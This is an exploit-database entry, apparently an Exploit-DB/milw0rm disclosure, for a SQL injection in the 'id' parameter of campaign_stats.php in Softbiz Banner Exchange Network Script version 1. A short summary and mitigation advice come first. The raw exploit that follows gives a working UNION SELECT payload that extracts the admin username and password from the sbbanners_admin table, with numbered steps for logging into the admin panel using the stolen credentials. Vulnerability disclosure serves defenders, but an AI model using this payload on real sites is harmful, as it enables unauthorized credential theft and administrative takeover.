Softbiz Banner Exchange Network Script ver 1 SQL INJECTION

vendor:

Banner Exchange Network Script

by:

IRCRASH (Dr.Crash)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Banner Exchange Network Script

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Softbiz Banner Exchange Network Script ver 1 SQL INJECTION

The Softbiz Banner Exchange Network Script ver 1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL code in the 'id' parameter of the 'campaign_stats.php' page. By doing so, the attacker can bypass authentication and retrieve sensitive information such as the admin username and password.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL Injection attacks. Additionally, keeping the software up to date with the latest security patches and conducting regular security audits can help identify and address any vulnerabilities.

Source

Exploit-DB raw data:

#####################################################################################
####         Softbiz Banner Exchange Network Script ver 1 SQL INJECTION          ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#                                                                                   #
#                                                                                   #
#####################################################################################
#Injection Adress : http://sitename/campaign_stats.php?id=<SQL C0de>                #
#                                                                                   #
#SQL C0de : 999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,admin_name,10,pwd,12,13,14,15/**/from/**/sbbanners_admin/*
#                                                                                   #
#####################################################################################
#Help :                                                                             #
#                                                                                   #
#Step 1 : Register in Site                                                          #
#Step 2 : Login in User panel with your email and password                          #
#Step 3 : Go too Sql address and find admin username and password                   #
#Step 4 : Go too http://sitename/admin/ and login with admin username and password  #
#Step 5 :  :)                                                                         #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-11-11]